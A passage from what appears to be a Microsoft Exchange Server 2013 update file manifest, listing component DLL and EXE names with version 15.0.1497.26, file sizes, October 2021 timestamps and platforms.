28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.clients.security.dll| 15.0.1497.26| 156,136| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.cluster.common.extensions.dll| 15.0.1497.26| 22,504| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.cluster.replay.dll| 15.0.1497.26| 2,704,360| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.0.1497.26| 108,008| 28-Oct-21| 19:33| x64| SP. \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.0.1497.26| 287,720| 28-Oct-21| 19:33| x64| SP. \nMicrosoft.exchange.cluster.shared.dll| 15.0.1497.26| 465,384| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.common.diskmanagement.dll| 15.0.1497.26| 55,776| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.common.dll| 15.0.1497.26| 157,648| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.common.inference.dll| 15.0.1497.26| 39,376| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.commonmsg.dll| 15.0.1497.26| 27,568| 28-Oct-21| 19:31| x64| SP. \nMicrosoft.exchange.compliance.dll| 15.0.1497.26| 94,688| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.0.1497.26| 173,016| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.0.1497.26| 74,712| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.compliance.taskplugins.dll| 15.0.1497.26| 25,576| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.compression.dll| 15.0.1497.26| 17,872| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.configuration.certificateauth.dll| 15.0.1497.26| 37,816| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.configuration.core.dll| 15.0.1497.26| 111,048| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.0.1497.26| 53,688| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.0.1497.26| 24,008| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.configuration.failfast.dll| 15.0.1497.26| 55,240| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.configuration.objectmodel.dll| 15.0.1497.26| 1,455,040| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.0.1497.26| 71,624| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.0.1497.26| 21,432| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.connections.common.dll| 15.0.1497.26| 77,280| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.connections.eas.dll| 15.0.1497.26| 235,984| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.connections.imap.dll| 15.0.1497.26| 115,168| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.connections.pop.dll| 15.0.1497.26| 74,720| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.0.1497.26| 185,768| 28-Oct-21| 19:28| x64| SP. \nMicrosoft.exchange.core.strings.dll| 15.0.1497.26| 599,504| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.data.applicationlogic.dll| 15.0.1497.26| 1,271,800| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.directory.dll| 15.0.1497.26| 6,639,088| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.dll| 15.0.1497.26| 1,536,480| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.0.1497.26| 314,336| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.ha.dll| 15.0.1497.26| 82,424| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.imageanalysis.dll| 15.0.1497.26| 107,504| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.mapi.dll| 15.0.1497.26| 175,072| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.metering.contracts.dll| 15.0.1497.26| 31,216| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.metering.dll| 15.0.1497.26| 99,296| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.providers.dll| 15.0.1497.26| 141,280| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.0.1497.26| 143,840| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.storage.dll| 15.0.1497.26| 8,165,872| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.0.1497.26| 36,336| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.datacenterstrings.dll| 15.0.1497.26| 75,224| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.0.1497.26| 23,072| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.diagnostics.dll| 15.0.1497.26| 1,539,040| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.0.1497.26| 24,080| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.diagnostics.service.common.dll| 15.0.1497.26| 322,072| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.0.1497.26| 134,688| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.diagnostics.service.exe| 15.0.1497.26| 127,520| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.0.1497.26| 50,656| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.directory.topologyservice.exe| 15.0.1497.26| 192,984| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.dxstore.dll| 15.0.1497.26| 279,520| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.0.1497.26| 20,960| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.edgecredentialsvc.exe| 15.0.1497.26| 21,984| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.edgesync.common.dll| 15.0.1497.26| 153,560| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.0.1497.26| 225,240| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.edgesyncsvc.exe| 15.0.1497.26| 98,256| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.ediscovery.export.dll| 15.0.1497.26| 1,126,376| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.0.1497.26| 1,126,376| 28-Oct-21| 19:35| Not applicable| SP. \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,522| 28-Oct-21| 20:42| Not applicable| SP. \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.0.1497.26| 87,504| 28-Oct-21| 19:35| Not applicable| SP. \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.0.1497.26| 296,424| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.0.1497.26| 56,256| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.entities.calendaring.dll| 15.0.1497.26| 208,336| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.entities.common.dll| 15.0.1497.26| 155,072| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.entities.datamodel.dll| 15.0.1497.26| 137,168| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.0.1497.26| 35,264| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.entities.people.dll| 15.0.1497.26| 37,304| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.eserepl.configuration.dll| 15.0.1497.26| 16,352| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.eserepl.dll| 15.0.1497.26| 120,296| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.0.1497.26| 37,352| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.extensibility.internal.dll| 15.0.1497.26| 560,088| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.extensibility.partner.dll| 15.0.1497.26| 15,824| 28-Oct-21| 19:35| x86| SP. \nMicrosoft.exchange.federateddirectory.dll| 15.0.1497.26| 76,776| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.frontendhttpproxy.dll| 15.0.1497.26| 572,400| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.0.1497.26| 42,984| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.helpprovider.dll| 15.0.1497.26| 39,408| 28-Oct-21| 20:01| x86| SP. \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.0.1497.26| 31,192| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.httpproxy.common.dll| 15.0.1497.26| 95,728| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.0.1497.26| 35,312| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.0.1497.26| 17,880| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.0.1497.26| 21,464| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.0.1497.26| 35,288| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.httpproxy.routing.dll| 15.0.1497.26| 63,960| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.httpredirectmodules.dll| 15.0.1497.26| 27,096| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.httputilities.dll| 15.0.1497.26| 20,968| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.hygiene.data.dll| 15.0.1497.26| 1,033,656| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.imap4.exe| 15.0.1497.26| 230,432| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.imap4.exe.fe| 15.0.1497.26| 230,432| 28-Oct-21| 19:31| Not applicable| SP. \nMicrosoft.exchange.imap4service.exe| 15.0.1497.26| 25,120| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.imap4service.exe.fe| 15.0.1497.26| 25,120| 28-Oct-21| 19:31| Not applicable| SP. \nMicrosoft.exchange.inference.common.dll| 15.0.1497.26| 71,656| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.inference.mdbcommon.dll| 15.0.1497.26| 75,760| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.0.1497.26| 93,680| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.inference.pipeline.dll| 15.0.1497.26| 21,488| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.inference.ranking.dll| 15.0.1497.26| 19,440| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.0.1497.26| 35,328| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.infoworker.common.dll| 15.0.1497.26| 1,662,960| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.0.1497.26| 164,352| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.isam.esebcli.dll| 15.0.1497.26| 100,280| 28-Oct-21| 19:33| x64| SP. \nMicrosoft.exchange.jobqueueservicelet.dll| 15.0.1497.26| 84,984| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.live.domainservices.dll| 15.0.1497.26| 122,352| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.0.1497.26| 20,512| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.0.1497.26| 18,976| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.loguploader.dll| 15.0.1497.26| 159,696| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.loguploaderproxy.dll| 15.0.1497.26| 61,408| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.mailboxloadbalance.dll| 15.0.1497.26| 346,128| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.0.1497.26| 43,536| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxloadbalanceclient.dll| 15.0.1497.26| 24,608| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.0.1497.26| 1,525,280| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.0.1497.26| 639,520| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.0.1497.26| 106,528| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.0.1497.26| 61,968| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.0.1497.26| 91,664| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.0.1497.26| 42,528| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.0.1497.26| 121,872| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.0.1497.26| 148,496| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.0.1497.26| 82,448| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.0.1497.26| 72,744| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.0.1497.26| 120,336| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxreplicationservice.upgrade14to15.dll| 15.0.1497.26| 276,496| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.0.1497.26| 140,272| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.0.1497.26| 517,104| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.0.1497.26| 191,976| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.compliancepolicy.dll| 15.0.1497.26| 42,976| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.controlpanel.dll| 15.0.1497.26| 6,405,544| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.0.1497.26| 286,120| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.management.deployment.analysis.dll| 15.0.1497.26| 96,728| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.deployment.dll| 15.0.1497.26| 614,888| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.detailstemplates.dll| 15.0.1497.26| 70,056| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.management.dll| 15.0.1497.26| #########| 28-Oct-21| 19:32| x64| SP. \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.0.1497.26| 60,840| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.management.mobility.dll| 15.0.1497.26| 306,656| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.powershell.support.dll| 15.0.1497.26| 229,344| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.0.1497.26| 47,080| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.rbacdefinition.dll| 15.0.1497.26| 6,657,528| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.recipient.dll| 15.0.1497.26| 854,504| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.management.reportingwebservice.dll| 15.0.1497.26| 146,360| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.management.snapin.esm.dll| 15.0.1497.26| 73,144| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.management.systemmanager.dll| 15.0.1497.26| 1,274,280| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.management.transport.dll| 15.0.1497.26| 764,408| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.managementgui.dll| 15.0.1497.26| 5,352,360| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.mapihttpclient.dll| 15.0.1497.26| 115,168| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.mapihttphandler.dll| 15.0.1497.26| 192,488| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagesecurity.dll| 15.0.1497.26| 78,824| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.0.1497.26| 66,016| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.0.1497.26| 28,640| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.0.1497.26| 173,024| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.0.1497.26| 25,568| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.0.1497.26| 153,064| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.0.1497.26| 309,728| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.0.1497.26| 34,296| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.0.1497.26| 98,784| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.migration.dll| 15.0.1497.26| 962,016| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.migrationmonitor.dll| 15.0.1497.26| 144,864| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.mobiledriver.dll| 15.0.1497.26| 139,224| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.0.1497.26| 3,922,928| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.0.1497.26| 20,496| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.net.dll| 15.0.1497.26| 4,035,024| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.notifications.broker.exe| 15.0.1497.26| 173,072| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.notifications.brokerapi.dll| 15.0.1497.26| 56,352| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.oabauthmodule.dll| 15.0.1497.26| 20,936| 28-Oct-21| 19:34| x86| SP. \nMicrosoft.exchange.oabrequesthandler.dll| 15.0.1497.26| 73,176| 28-Oct-21| 19:34| x86| SP. \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.0.1497.26| 15,328| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.pop3.exe| 15.0.1497.26| 92,688| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.pop3.exe.fe| 15.0.1497.26| 92,688| 28-Oct-21| 19:31| Not applicable| SP. \nMicrosoft.exchange.pop3service.exe| 15.0.1497.26| 25,120| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.pop3service.exe.fe| 15.0.1497.26| 25,120| 28-Oct-21| 19:31| Not applicable| SP. \nMicrosoft.exchange.popimap.core.dll| 15.0.1497.26| 209,944| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.popimap.core.dll.fe| 15.0.1497.26| 209,944| 28-Oct-21| 19:31| Not applicable| SP. \nMicrosoft.exchange.powersharp.management.dll| 15.0.1497.26| 4,177,912| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.powershell.configuration.dll| 15.0.1497.26| 261,560| 28-Oct-21| 19:31| x64| SP. \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.0.1497.26| 41,376| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.protectedservicehost.exe| 15.0.1497.26| 29,160| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.0.1497.26| 134,144| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.protocols.mapi.dll| 15.0.1497.26| 406,528| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.provisioningagent.dll| 15.0.1497.26| 228,328| 28-Oct-21| 19:32| x64| SP. \nMicrosoft.exchange.provisioningservicelet.dll| 15.0.1497.26| 80,864| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.pushnotifications.dll| 15.0.1497.26| 105,416| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.0.1497.26| 408,024| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.pushnotifications.server.dll| 15.0.1497.26| 72,648| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.rpc.dll| 15.0.1497.26| 1,511,904| 28-Oct-21| 19:32| x64| SP. \nMicrosoft.exchange.rpcclientaccess.dll| 15.0.1497.26| 150,496| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.0.1497.26| 62,440| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.0.1497.26| 483,808| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.0.1497.26| 149,464| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.0.1497.26| 733,648| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.0.1497.26| 207,840| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.0.1497.26| 31,688| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.rpchttpmodules.dll| 15.0.1497.26| 41,440| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.0.1497.26| 51,168| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.rules.common.dll| 15.0.1497.26| 137,184| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.0.1497.26| 20,448| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.search.core.dll| 15.0.1497.26| 290,248| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.search.engine.dll| 15.0.1497.26| 97,224| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.search.fast.dll| 15.0.1497.26| 329,176| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.search.mdb.dll| 15.0.1497.26| 175,048| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.search.query.dll| 15.0.1497.26| 95,176| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.search.service.exe| 15.0.1497.26| 29,128| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.exchange.security.dll| 15.0.1497.26| 804,280| 28-Oct-21| 19:34| x86| SP. \nMicrosoft.exchange.security.msarpsservice.exe| 15.0.1497.26| 19,912| 28-Oct-21| 19:34| x86| SP. \nMicrosoft.exchange.server.storage.admininterface.dll| 15.0.1497.26| 216,064| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.common.dll| 15.0.1497.26| 413,160| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.0.1497.26| 190,960| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.0.1497.26| 95,728| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.0.1497.26| 82,920| 28-Oct-21| 19:32| x64| SP. \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.0.1497.26| 67,064| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.ha.dll| 15.0.1497.26| 82,424| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.0.1497.26| 190,944| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.0.1497.26| 822,760| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.0.1497.26| 426,976| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.0.1497.26| 48,120| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.0.1497.26| 561,128| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.0.1497.26| 784,864| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.propertytag.dll| 15.0.1497.26| 30,688| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.0.1497.26| 118,776| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.0.1497.26| 738,280| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.0.1497.26| 93,152| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.server.storage.workermanager.dll| 15.0.1497.26| 34,808| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.servicehost.exe| 15.0.1497.26| 54,752| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.0.1497.26| 49,120| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.services.dll| 15.0.1497.26| 7,786,424| 28-Oct-21| 19:34| x86| SP. \nMicrosoft.exchange.services.onlinemeetings.dll| 15.0.1497.26| 214,472| 28-Oct-21| 19:34| x86| SP. \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.0.1497.26| 58,856| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.0.1497.26| 84,968| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.setup.common.dll| 15.0.1497.26| 308,192| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.setup.commonbase.dll| 15.0.1497.26| 35,816| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.setup.console.dll| 15.0.1497.26| 27,624| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.setup.gui.dll| 15.0.1497.26| 120,808| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.setup.parser.dll| 15.0.1497.26| 54,240| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.sharedcache.client.dll| 15.0.1497.26| 23,008| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.sharedcache.exe| 15.0.1497.26| 56,808| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.sharepointsignalstore.dll| 15.0.1497.26| 29,664| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.sqm.dll| 15.0.1497.26| 48,096| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.store.service.exe| 15.0.1497.26| 25,056| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.store.worker.exe| 15.0.1497.26| 26,600| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.storedriver.dll| 15.0.1497.26| 77,296| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.storeprovider.dll| 15.0.1497.26| 998,360| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.0.1497.26| 15,840| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.textprocessing.dll| 15.0.1497.26| 151,520| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.0.1497.26| 24,552| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.0.1497.26| 96,232| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.0.1497.26| 22,512| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.0.1497.26| 20,464| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.0.1497.26| 217,056| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.0.1497.26| 103,912| 28-Oct-21| 19:31| 